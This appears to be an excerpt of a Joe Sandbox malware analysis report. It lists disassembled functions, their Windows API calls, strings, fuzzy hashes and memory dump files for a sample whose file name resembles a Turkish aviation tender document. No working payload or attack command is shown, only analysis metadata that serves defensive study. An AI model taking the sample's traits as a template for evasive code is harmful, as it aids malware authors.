                                                                                                                                    • Instruction ID: 2ffc7940531c02fee8533ab013164aa29f6c58844a24a0d88aee2a14bcdc9efd
                                                                                                                                    • Opcode Fuzzy Hash: 0836eba57d078cdc858a76bab9d0656f6f91a868c4f704401484bce6bd8a0f7f
                                                                                                                                    • Instruction Fuzzy Hash: 8701F1B1A41219AB8B14EBE0CC41DFE7368EF0A360B100A09F9656B2E1DE39580CE650
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00FF8D6B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                                    • Opcode ID: de07283268f517d01a373784b78dbb0c230a17165a78e92445898c27c11f5d12
                                                                                                                                    • Instruction ID: 0e828ea2e0427c75c59f2ef43c025e7fc0375ee54f7d1e906345f63624ec73a6
                                                                                                                                    • Opcode Fuzzy Hash: de07283268f517d01a373784b78dbb0c230a17165a78e92445898c27c11f5d12
                                                                                                                                    • Instruction Fuzzy Hash: AB01D4B1A4110DABCB24EBA0CD52EFF77A8DF1A390F100019B905672A1DE195E0CF271
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00FF8DEE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                                    • Opcode ID: 39162f0c839a42932ab8ee16182d05eddbb600b7472916f7a77b6ad2c3a7373c
                                                                                                                                    • Instruction ID: 47d21ac87dbd655b76759542a53931bd4f88f30530b99acd26f28bb746a1b8a4
                                                                                                                                    • Opcode Fuzzy Hash: 39162f0c839a42932ab8ee16182d05eddbb600b7472916f7a77b6ad2c3a7373c
                                                                                                                                    • Instruction Fuzzy Hash: 8401A2B1A4110DA7DB25EBA4CD42EFF77ACDF16390F100019B945A72A2DE298E0DF271
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassName_wcscmp
                                                                                                                                    • String ID: #32770
                                                                                                                                    • API String ID: 2292705959-463685578
                                                                                                                                    • Opcode ID: 5b3dc64a906d3b9e2111922a2256f7cc586a83f9fd2c49008a608eb57cd7dd0d
                                                                                                                                    • Instruction ID: 6fe23d54de6d20e493c9998c278bcf2140407e5cf80e333c5cd41b2698f15c8a
                                                                                                                                    • Opcode Fuzzy Hash: 5b3dc64a906d3b9e2111922a2256f7cc586a83f9fd2c49008a608eb57cd7dd0d
                                                                                                                                    • Instruction Fuzzy Hash: 49E0D8336002292BE730AA9AAC4AFA7F7FCEB45B70F01005BFD44D7041D565AB4587E0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FDB314: _memset.LIBCMT ref: 00FDB321
                                                                                                                                      • Part of subcall function 00FC0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FDB2F0,?,?,?,00FA100A), ref: 00FC0945
                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00FA100A), ref: 00FDB2F4
                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FA100A), ref: 00FDB303
                                                                                                                                    Strings
                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FDB2FE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                    • API String ID: 3158253471-631824599
                                                                                                                                    • Opcode ID: 00b2df782733cf215fef82e628c503579a61314b41128271e941c502de66cbd8
                                                                                                                                    • Instruction ID: 3987e6fc83d0ca67511c2f8893248d23edd2c54a569be5f9b96fdd37f6ca7d19
                                                                                                                                    • Opcode Fuzzy Hash: 00b2df782733cf215fef82e628c503579a61314b41128271e941c502de66cbd8
                                                                                                                                    • Instruction Fuzzy Hash: B1E065B0600302CBD7309F29E9047427AE8AF01794F058A6EE486C7745EBB9E408EBA1
                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00FE1775
                                                                                                                                      • Part of subcall function 0101BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00FE195E,?), ref: 0101BFFE
                                                                                                                                      • Part of subcall function 0101BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0101C010
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00FE196D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                                    • String ID: WIN_XPe
                                                                                                                                    • API String ID: 582185067-3257408948
                                                                                                                                    • Opcode ID: 0576f6870819b6901b27acecfa7d0459addbe2d2a18847922701d8209a490619
                                                                                                                                    • Instruction ID: 5c9a39efadd74ec8dafc6329771c6c908db397f8d09cd61e52d19ebb165bec2e
                                                                                                                                    • Opcode Fuzzy Hash: 0576f6870819b6901b27acecfa7d0459addbe2d2a18847922701d8209a490619
                                                                                                                                    • Instruction Fuzzy Hash: 33F0EDB1801149DFDB25DF92C594BECBBF8BB18701F640089E142A2194DB764F88EF60
                                                                                                                                    APIs
                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0102596E
                                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01025981
                                                                                                                                      • Part of subcall function 01005244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                    • Opcode ID: 17063db6c6b375b2ff699424e1eb5a6292a36656b11ebc7b08156171400e3296
                                                                                                                                    • Instruction ID: 56922b281b37a31d82cc4fb86904661d7fed76037d2f6615d19db82c8a0d2fc0
                                                                                                                                    • Opcode Fuzzy Hash: 17063db6c6b375b2ff699424e1eb5a6292a36656b11ebc7b08156171400e3296
                                                                                                                                    • Instruction Fuzzy Hash: 3DD0C931384312B6E6B4BA719C0EFD77A24AF14B90F100829BBC9AA1C4C9F59800CB54
                                                                                                                                    APIs
                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010259AE
                                                                                                                                    • PostMessageW.USER32(00000000), ref: 010259B5
                                                                                                                                      • Part of subcall function 01005244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                    • Opcode ID: 86d8c3961d21362fec569b6e1f8d28829ca90c0f026d6a55d7d4082bfa5618a2
                                                                                                                                    • Instruction ID: 1a12597c1c7201f9bccd8c9dcdec4010ad85c1f96ff333ccbbfe9a7e752686f4
                                                                                                                                    • Opcode Fuzzy Hash: 86d8c3961d21362fec569b6e1f8d28829ca90c0f026d6a55d7d4082bfa5618a2
                                                                                                                                    • Instruction Fuzzy Hash: 3DD0C9313803127AE6B5BA719C0EFD77624AF15B90F100829BBC5AA1C4C9F5A800CB54